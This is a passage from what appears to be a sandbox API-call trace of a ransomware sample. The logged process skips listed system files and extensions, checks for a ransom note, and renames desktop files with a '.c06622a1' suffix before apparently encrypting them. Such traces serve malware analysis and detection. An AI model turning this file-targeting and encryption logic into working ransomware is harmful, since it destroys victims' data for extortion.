(_String="ntldr") returned 0x5 [0156.503] _wcsicmp (_Str1="ntuser.dat", _Str2="AiMvEt9bBE9f9FGdQ.mp3") returned 13 [0156.503] wcslen (_String="ntuser.dat") returned 0xa [0156.503] _wcsicmp (_Str1="ntuser.dat.log", _Str2="AiMvEt9bBE9f9FGdQ.mp3") returned 13 [0156.503] wcslen (_String="ntuser.dat.log") returned 0xe [0156.503] _wcsicmp (_Str1="ntuser.ini", _Str2="AiMvEt9bBE9f9FGdQ.mp3") returned 13 [0156.503] wcslen (_String="ntuser.ini") returned 0xa [0156.503] _wcsicmp (_Str1="thumbs.db", _Str2="AiMvEt9bBE9f9FGdQ.mp3") returned 19 [0156.503] wcslen (_String="thumbs.db") returned 0x9 [0156.503] _wcsicmp (_Str1="386", _Str2="mp3") returned -58 [0156.503] wcslen (_String="386") returned 0x3 [0156.504] _wcsicmp (_Str1="adv", _Str2="mp3") returned -12 [0156.504] wcslen (_String="adv") returned 0x3 [0156.504] _wcsicmp (_Str1="ani", _Str2="mp3") returned -12 [0156.504] wcslen (_String="ani") returned 0x3 [0156.504] _wcsicmp (_Str1="bat", _Str2="mp3") returned -11 [0156.504] wcslen (_String="bat") returned 0x3 [0156.504] _wcsicmp (_Str1="bin", _Str2="mp3") returned -11 [0156.504] wcslen (_String="bin") returned 0x3 [0156.504] _wcsicmp (_Str1="cab", _Str2="mp3") returned -10 [0156.504] wcslen (_String="cab") returned 0x3 [0156.504] _wcsicmp (_Str1="cmd", _Str2="mp3") returned -10 [0156.504] wcslen (_String="cmd") returned 0x3 [0156.504] _wcsicmp (_Str1="com", _Str2="mp3") returned -10 [0156.504] wcslen (_String="com") returned 0x3 [0156.504] _wcsicmp (_Str1="cpl", _Str2="mp3") returned -10 [0156.504] wcslen (_String="cpl") returned 0x3 [0156.504] _wcsicmp (_Str1="cur", _Str2="mp3") returned -10 [0156.504] wcslen (_String="cur") returned 0x3 [0156.504] _wcsicmp (_Str1="deskthemepack", _Str2="mp3") returned -9 [0156.504] wcslen (_String="deskthemepack") returned 0xd [0156.504] _wcsicmp (_Str1="diagcab", _Str2="mp3") returned -9 [0156.504] wcslen (_String="diagcab") returned 0x7 [0156.504] _wcsicmp (_Str1="diagcfg", _Str2="mp3") returned -9 [0156.504] wcslen (_String="diagcfg") returned 0x7 [0156.504] _wcsicmp (_Str1="diagpkg", _Str2="mp3") returned -9 [0156.504] wcslen (_String="diagpkg") returned 0x7 [0156.504] _wcsicmp (_Str1="dll", _Str2="mp3") returned -9 [0156.504] wcslen (_String="dll") returned 0x3 [0156.504] _wcsicmp (_Str1="drv", _Str2="mp3") returned -9 [0156.504] wcslen (_String="drv") returned 0x3 [0156.504] _wcsicmp (_Str1="exe", _Str2="mp3") returned -8 [0156.504] wcslen (_String="exe") returned 0x3 [0156.504] _wcsicmp (_Str1="hlp", _Str2="mp3") returned -5 [0156.504] wcslen (_String="hlp") returned 0x3 [0156.505] _wcsicmp (_Str1="icl", _Str2="mp3") returned -4 [0156.505] wcslen (_String="icl") returned 0x3 [0156.505] _wcsicmp (_Str1="icns", _Str2="mp3") returned -4 [0156.505] wcslen (_String="icns") returned 0x4 [0156.505] _wcsicmp (_Str1="ico", _Str2="mp3") returned -4 [0156.505] wcslen (_String="ico") returned 0x3 [0156.505] _wcsicmp (_Str1="ics", _Str2="mp3") returned -4 [0156.505] wcslen (_String="ics") returned 0x3 [0156.505] _wcsicmp (_Str1="idx", _Str2="mp3") returned -4 [0156.505] wcslen (_String="idx") returned 0x3 [0156.505] _wcsicmp (_Str1="ldf", _Str2="mp3") returned -1 [0156.505] wcslen (_String="ldf") returned 0x3 [0156.505] _wcsicmp (_Str1="lnk", _Str2="mp3") returned -1 [0156.505] wcslen (_String="lnk") returned 0x3 [0156.505] _wcsicmp (_Str1="mod", _Str2="mp3") returned -1 [0156.505] wcslen (_String="mod") returned 0x3 [0156.505] _wcsicmp (_Str1="mpa", _Str2="mp3") returned 46 [0156.505] wcslen (_String="mpa") returned 0x3 [0156.505] _wcsicmp (_Str1="msc", _Str2="mp3") returned 3 [0156.505] wcslen (_String="msc") returned 0x3 [0156.505] _wcsicmp (_Str1="msp", _Str2="mp3") returned 3 [0156.505] wcslen (_String="msp") returned 0x3 [0156.505] _wcsicmp (_Str1="msstyles", _Str2="mp3") returned 3 [0156.505] wcslen (_String="msstyles") returned 0x8 [0156.505] _wcsicmp (_Str1="msu", _Str2="mp3") returned 3 [0156.505] wcslen (_String="msu") returned 0x3 [0156.505] _wcsicmp (_Str1="nls", _Str2="mp3") returned 1 [0156.505] wcslen (_String="nls") returned 0x3 [0156.505] _wcsicmp (_Str1="nomedia", _Str2="mp3") returned 1 [0156.505] wcslen (_String="nomedia") returned 0x7 [0156.505] _wcsicmp (_Str1="ocx", _Str2="mp3") returned 2 [0156.505] wcslen (_String="ocx") returned 0x3 [0156.505] _wcsicmp (_Str1="prf", _Str2="mp3") returned 3 [0156.505] wcslen (_String="prf") returned 0x3 [0156.506] _wcsicmp (_Str1="ps1", _Str2="mp3") returned 3 [0156.506] wcslen (_String="ps1") returned 0x3 [0156.506] _wcsicmp (_Str1="rom", _Str2="mp3") returned 5 [0156.506] wcslen (_String="rom") returned 0x3 [0156.506] _wcsicmp (_Str1="rtp", _Str2="mp3") returned 5 [0156.506] wcslen (_String="rtp") returned 0x3 [0156.506] _wcsicmp (_Str1="scr", _Str2="mp3") returned 6 [0156.506] wcslen (_String="scr") returned 0x3 [0156.506] _wcsicmp (_Str1="shs", _Str2="mp3") returned 6 [0156.506] wcslen (_String="shs") returned 0x3 [0156.506] _wcsicmp (_Str1="spl", _Str2="mp3") returned 6 [0156.506] wcslen (_String="spl") returned 0x3 [0156.506] _wcsicmp (_Str1="sys", _Str2="mp3") returned 6 [0156.506] wcslen (_String="sys") returned 0x3 [0156.506] _wcsicmp (_Str1="theme", _Str2="mp3") returned 7 [0156.506] wcslen (_String="theme") returned 0x5 [0156.506] _wcsicmp (_Str1="themepack", _Str2="mp3") returned 7 [0156.506] wcslen (_String="themepack") returned 0x9 [0156.506] _wcsicmp (_Str1="wpx", _Str2="mp3") returned 10 [0156.506] wcslen (_String="wpx") returned 0x3 [0156.506] _wcsicmp (_Str1="lock", _Str2="mp3") returned -1 [0156.506] wcslen (_String="lock") returned 0x4 [0156.506] _wcsicmp (_Str1="key", _Str2="mp3") returned -2 [0156.506] wcslen (_String="key") returned 0x3 [0156.506] _wcsicmp (_Str1="hta", _Str2="mp3") returned -5 [0156.506] wcslen (_String="hta") returned 0x3 [0156.506] _wcsicmp (_Str1="msi", _Str2="mp3") returned 3 [0156.506] wcslen (_String="msi") returned 0x3 [0156.506] _wcsicmp (_Str1="pdb", _Str2="mp3") returned 3 [0156.506] wcslen (_String="pdb") returned 0x3 [0156.506] _wcsicmp (_Str1="sqlite", _Str2="mp3") returned 6 [0156.506] wcslen (_String="sqlite") returned 0x6 [0156.506] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr")) returned 0x10 [0156.507] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0156.507] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" [0156.507] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR") returned 0x37 [0156.507] wcscpy (in: _Dest=0x32400d0, _Source="AiMvEt9bBE9f9FGdQ.mp3" | out: _Dest="AiMvEt9bBE9f9FGdQ.mp3") returned="AiMvEt9bBE9f9FGdQ.mp3" [0156.507] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\AiMvEt9bBE9f9FGdQ.mp3", dwFileAttributes=0x80) returned 1 [0156.519] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\AiMvEt9bBE9f9FGdQ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\aimvet9bbe9f9fgdq.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0156.519] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.519] ReadFile (in: hFile=0x19c, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0156.520] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xb1db2cc1 [0156.520] RtlComputeCrc32 (PartialCrc=0x2cc1, Buffer=0x32e9a4, Length=0x80) returned 0xb7d8b152 [0156.520] RtlComputeCrc32 (PartialCrc=0xb152, Buffer=0x32e9a4, Length=0x80) returned 0x84269049 [0156.520] RtlComputeCrc32 (PartialCrc=0x9049, Buffer=0x32e9a4, Length=0x80) returned 0x579f2ce1 [0156.520] RtlComputeCrc32 (PartialCrc=0x2ce1, Buffer=0x32e9a4, Length=0x80) returned 0x64f76547 [0156.520] CloseHandle (hObject=0x19c) returned 1 [0156.520] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0156.520] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\AiMvEt9bBE9f9FGdQ.mp3" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\AiMvEt9bBE9f9FGdQ.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\AiMvEt9bBE9f9FGdQ.mp3" [0156.520] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\AiMvEt9bBE9f9FGdQ.mp3") returned 0x4d [0156.520] wcscpy (in: _Dest=0x3250102, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.521] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\AiMvEt9bBE9f9FGdQ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\aimvet9bbe9f9fgdq.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\AiMvEt9bBE9f9FGdQ.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\aimvet9bbe9f9fgdq.mp3.c06622a1"), dwFlags=0x8) returned 1 [0156.545] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\AiMvEt9bBE9f9FGdQ.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\aimvet9bbe9f9fgdq.mp3.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x19c [0156.546] CreateIoCompletionPort (FileHandle=0x19c, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0156.546] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0156.550] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x91e872f [0156.550] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x18a8eb54 [0156.550] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x149324c8 [0156.550] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x545130dc [0156.550] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x10042b26 [0156.550] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7b81d1a [0156.550] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x15a56694 [0156.550] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xf066ee1 [0156.554] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0x153252eb [0156.554] RtlComputeCrc32 (PartialCrc=0x52eb, Buffer=0x710094, Length=0x80) returned 0x16b46a32 [0156.554] RtlComputeCrc32 (PartialCrc=0x6a32, Buffer=0x710094, Length=0x80) returned 0xfbda5fc0 [0156.554] RtlComputeCrc32 (PartialCrc=0x5fc0, Buffer=0x710094, Length=0x80) returned 0xc225c7f2 [0156.554] RtlComputeCrc32 (PartialCrc=0xc7f2, Buffer=0x710094, Length=0x80) returned 0xc4965785 [0156.554] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0156.554] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0156.554] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0156.554] FindNextFileW (in: hFindFile=0x17c1d0, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdaa4170, ftCreationTime.dwHighDateTime=0x1d5e6f9, ftLastAccessTime.dwLowDateTime=0xd836b650, ftLastAccessTime.dwHighDateTime=0x1d5e811, ftLastWriteTime.dwLowDateTime=0xd836b650, ftLastWriteTime.dwHighDateTime=0x1d5e811, nFileSizeHigh=0x0, nFileSizeLow=0x11235, dwReserved0=0x0, dwReserved1=0x0, cFileName="C4Mfi4 w31Ph8.bmp", cAlternateFileName="C4MFI4~1.BMP")) returned 1 [0156.554] _wcsicmp (_Str1="C4Mfi4 w31Ph8.bmp", _Str2="README.c06622a1.TXT") returned -15 [0156.554] wcsstr (_Str="C4Mfi4 w31Ph8.bmp", _SubStr="README") returned 0x0 [0156.554] _wcsicmp (_Str1="autorun.inf", _Str2="C4Mfi4 w31Ph8.bmp") returned -2 [0156.554] wcslen (_String="autorun.inf") returned 0xb [0156.554] _wcsicmp (_Str1="boot.ini", _Str2="C4Mfi4 w31Ph8.bmp") returned -1 [0156.554] wcslen (_String="boot.ini") returned 0x8 [0156.554] _wcsicmp (_Str1="bootfont.bin", _Str2="C4Mfi4 w31Ph8.bmp") returned -1 [0156.554] wcslen (_String="bootfont.bin") returned 0xc [0156.554] _wcsicmp (_Str1="bootsect.bak", _Str2="C4Mfi4 w31Ph8.bmp") returned -1 [0156.554] wcslen (_String="bootsect.bak") returned 0xc [0156.554] _wcsicmp (_Str1="desktop.ini", _Str2="C4Mfi4 w31Ph8.bmp") returned 1 [0156.554] wcslen (_String="desktop.ini") returned 0xb [0156.554] _wcsicmp (_Str1="iconcache.db", _Str2="C4Mfi4 w31Ph8.bmp") returned 6 [0156.554] wcslen (_String="iconcache.db") returned 0xc [0156.555] _wcsicmp (_Str1="ntldr", _Str2="C4Mfi4 w31Ph8.bmp") returned 11 [0156.555] wcslen (_String="ntldr") returned 0x5 [0156.555] _wcsicmp (_Str1="ntuser.dat", _Str2="C4Mfi4 w31Ph8.bmp") returned 11 [0156.555] wcslen (_String="ntuser.dat") returned 0xa [0156.555] _wcsicmp (_Str1="ntuser.dat.log", _Str2="C4Mfi4 w31Ph8.bmp") returned 11 [0156.555] wcslen (_String="ntuser.dat.log") returned 0xe [0156.555] _wcsicmp (_Str1="ntuser.ini", _Str2="C4Mfi4 w31Ph8.bmp") returned 11 [0156.555] wcslen (_String="ntuser.ini") returned 0xa [0156.555] _wcsicmp (_Str1="thumbs.db", _Str2="C4Mfi4 w31Ph8.bmp") returned 17 [0156.555] wcslen (_String="thumbs.db") returned 0x9 [0156.555] _wcsicmp (_Str1="386", _Str2="bmp") returned -47 [0156.555] wcslen (_String="386") returned 0x3 [0156.555] _wcsicmp (_Str1="adv", _Str2="bmp") returned -1 [0156.555] wcslen (_String="adv") returned 0x3 [0156.555] _wcsicmp (_Str1="ani", _Str2="bmp") returned -1 [0156.555] wcslen (_String="ani") returned 0x3 [0156.555] _wcsicmp (_Str1="bat", _Str2="bmp") returned -12 [0156.555] wcslen (_String="bat") returned 0x3 [0156.555] _wcsicmp (_Str1="bin", _Str2="bmp") returned -4 [0156.555] wcslen (_String="bin") returned 0x3 [0156.555] _wcsicmp (_Str1="cab", _Str2="bmp") returned 1 [0156.555] wcslen (_String="cab") returned 0x3 [0156.555] _wcsicmp (_Str1="cmd", _Str2="bmp") returned 1 [0156.555] wcslen (_String="cmd") returned 0x3 [0156.555] _wcsicmp (_Str1="com", _Str2="bmp") returned 1 [0156.555] wcslen (_String="com") returned 0x3 [0156.555] _wcsicmp (_Str1="cpl", _Str2="bmp") returned 1 [0156.555] wcslen (_String="cpl") returned 0x3 [0156.555] _wcsicmp (_Str1="cur", _Str2="bmp") returned 1 [0156.555] wcslen (_String="cur") returned 0x3 [0156.556] _wcsicmp (_Str1="deskthemepack", _Str2="bmp") returned 2 [0156.556] wcslen (_String="deskthemepack") returned 0xd [0156.556] _wcsicmp (_Str1="diagcab", _Str2="bmp") returned 2 [0156.556] wcslen (_String="diagcab") returned 0x7 [0156.556] _wcsicmp (_Str1="diagcfg", _Str2="bmp") returned 2 [0156.556] wcslen (_String="diagcfg") returned 0x7 [0156.556] _wcsicmp (_Str1="diagpkg", _Str2="bmp") returned 2 [0156.556] wcslen (_String="diagpkg") returned 0x7 [0156.556] _wcsicmp (_Str1="dll", _Str2="bmp") returned 2 [0156.556] wcslen (_String="dll") returned 0x3 [0156.556] _wcsicmp (_Str1="drv", _Str2="bmp") returned 2 [0156.556] wcslen (_String="drv") returned 0x3 [0156.556] _wcsicmp (_Str1="exe", _Str2="bmp") returned 3 [0156.556] wcslen (_String="exe") returned 0x3 [0156.556] _wcsicmp (_Str1="hlp", _Str2="bmp") returned 6 [0156.556] wcslen (_String="hlp") returned 0x3 [0156.556] _wcsicmp (_Str1="icl", _Str2="bmp") returned 7 [0156.556] wcslen (_String="icl") returned 0x3 [0156.556] _wcsicmp (_Str1="icns", _Str2="bmp") returned 7 [0156.556] wcslen (_String="icns") returned 0x4 [0156.556] _wcsicmp (_Str1="ico", _Str2="bmp") returned 7 [0156.556] wcslen (_String="ico") returned 0x3 [0156.556] _wcsicmp (_Str1="ics", _Str2="bmp") returned 7 [0156.556] wcslen (_String="ics") returned 0x3 [0156.556] _wcsicmp (_Str1="idx", _Str2="bmp") returned 7 [0156.556] wcslen (_String="idx") returned 0x3 [0156.556] _wcsicmp (_Str1="ldf", _Str2="bmp") returned 10 [0156.556] wcslen (_String="ldf") returned 0x3 [0156.556] _wcsicmp (_Str1="lnk", _Str2="bmp") returned 10 [0156.557] wcslen (_String="lnk") returned 0x3 [0156.557] _wcsicmp (_Str1="mod", _Str2="bmp") returned 11 [0156.557] wcslen (_String="mod") returned 0x3 [0156.557] _wcsicmp (_Str1="mpa", _Str2="bmp") returned 11 [0156.557] wcslen (_String="mpa") returned 0x3 [0156.557] _wcsicmp (_Str1="msc", _Str2="bmp") returned 11 [0156.557] wcslen (_String="msc") returned 0x3 [0156.557] _wcsicmp (_Str1="msp", _Str2="bmp") returned 11 [0156.557] wcslen (_String="msp") returned 0x3 [0156.557] _wcsicmp (_Str1="msstyles", _Str2="bmp") returned 11 [0156.557] wcslen (_String="msstyles") returned 0x8 [0156.557] _wcsicmp (_Str1="msu", _Str2="bmp") returned 11 [0156.557] wcslen (_String="msu") returned 0x3 [0156.557] _wcsicmp (_Str1="nls", _Str2="bmp") returned 12 [0156.557] wcslen (_String="nls") returned 0x3 [0156.557] _wcsicmp (_Str1="nomedia", _Str2="bmp") returned 12 [0156.557] wcslen (_String="nomedia") returned 0x7 [0156.557] _wcsicmp (_Str1="ocx", _Str2="bmp") returned 13 [0156.557] wcslen (_String="ocx") returned 0x3 [0156.557] _wcsicmp (_Str1="prf", _Str2="bmp") returned 14 [0156.557] wcslen (_String="prf") returned 0x3 [0156.557] _wcsicmp (_Str1="ps1", _Str2="bmp") returned 14 [0156.557] wcslen (_String="ps1") returned 0x3 [0156.557] _wcsicmp (_Str1="rom", _Str2="bmp") returned 16 [0156.557] wcslen (_String="rom") returned 0x3 [0156.557] _wcsicmp (_Str1="rtp", _Str2="bmp") returned 16 [0156.557] wcslen (_String="rtp") returned 0x3 [0156.557] _wcsicmp (_Str1="scr", _Str2="bmp") returned 17 [0156.557] wcslen (_String="scr") returned 0x3 [0156.557] _wcsicmp (_Str1="shs", _Str2="bmp") returned 17 [0156.557] wcslen (_String="shs") returned 0x3 [0156.557] _wcsicmp (_Str1="spl", _Str2="bmp") returned 17 [0156.558] wcslen (_String="spl") returned 0x3 [0156.558] _wcsicmp (_Str1="sys", _Str2="bmp") returned 17 [0156.558] wcslen (_String="sys") returned 0x3 [0156.558] _wcsicmp (_Str1="theme", _Str2="bmp") returned 18 [0156.558] wcslen (_String="theme") returned 0x5 [0156.558] _wcsicmp (_Str1="themepack", _Str2="bmp") returned 18 [0156.558] wcslen (_String="themepack") returned 0x9 [0156.558] _wcsicmp (_Str1="wpx", _Str2="bmp") returned 21 [0156.558] wcslen (_String="wpx") returned 0x3 [0156.558] _wcsicmp (_Str1="lock", _Str2="bmp") returned 10 [0156.558] wcslen (_String="lock") returned 0x4 [0156.558] _wcsicmp (_Str1="key", _Str2="bmp") returned 9 [0156.558] wcslen (_String="key") returned 0x3 [0156.558] _wcsicmp (_Str1="hta", _Str2="bmp") returned 6 [0156.558] wcslen (_String="hta") returned 0x3 [0156.558] _wcsicmp (_Str1="msi", _Str2="bmp") returned 11 [0156.558] wcslen (_String="msi") returned 0x3 [0156.558] _wcsicmp (_Str1="pdb", _Str2="bmp") returned 14 [0156.558] wcslen (_String="pdb") returned 0x3 [0156.558] _wcsicmp (_Str1="sqlite", _Str2="bmp") returned 17 [0156.558] wcslen (_String="sqlite") returned 0x6 [0156.558] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr")) returned 0x10 [0156.558] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0156.558] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" [0156.558] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR") returned 0x37 [0156.559] wcscpy (in: _Dest=0x32400d0, _Source="C4Mfi4 w31Ph8.bmp" | out: _Dest="C4Mfi4 w31Ph8.bmp") returned="C4Mfi4 w31Ph8.bmp" [0156.559] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\C4Mfi4 w31Ph8.bmp", dwFileAttributes=0x80) returned 1 [0156.559] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\C4Mfi4 w31Ph8.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\c4mfi4 w31ph8.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b8 [0156.559] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.559] ReadFile (in: hFile=0x1b8, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0156.560] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x6a57f920 [0156.560] RtlComputeCrc32 (PartialCrc=0xf920, Buffer=0x32e9a4, Length=0x80) returned 0xf54bde81 [0156.560] RtlComputeCrc32 (PartialCrc=0xde81, Buffer=0x32e9a4, Length=0x80) returned 0x7ad6c25f [0156.560] RtlComputeCrc32 (PartialCrc=0xc25f, Buffer=0x32e9a4, Length=0x80) returned 0x6e681393 [0156.560] RtlComputeCrc32 (PartialCrc=0x1393, Buffer=0x32e9a4, Length=0x80) returned 0xecad5ff [0156.560] CloseHandle (hObject=0x1b8) returned 1 [0156.560] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0156.560] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\C4Mfi4 w31Ph8.bmp" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\C4Mfi4 w31Ph8.bmp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\C4Mfi4 w31Ph8.bmp" [0156.560] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\C4Mfi4 w31Ph8.bmp") returned 0x49 [0156.560] wcscpy (in: _Dest=0x32500fa, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.560] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\C4Mfi4 w31Ph8.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\c4mfi4 w31ph8.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\C4Mfi4 w31Ph8.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\c4mfi4 w31ph8.bmp.c06622a1"), dwFlags=0x8) returned 1 [0156.563] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\C4Mfi4 w31Ph8.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\c4mfi4 w31ph8.bmp.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1b8 [0156.563] CreateIoCompletionPort (FileHandle=0x1b8, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0156.563] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2690020 [0156.570] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7d5622f2 [0156.570] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x634f3be1 [0156.570] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5738ff63 [0156.570] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x183ca69e [0156.570] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1f3e45cc [0156.570] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2cc2e431 [0156.570] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7b851994 [0156.570] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6bf6009a [0156.573] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2690094, Length=0x80) returned 0xe03a0cff [0156.573] RtlComputeCrc32 (PartialCrc=0xcff, Buffer=0x2690094, Length=0x80) returned 0xbc5d273 [0156.573] RtlComputeCrc32 (PartialCrc=0xd273, 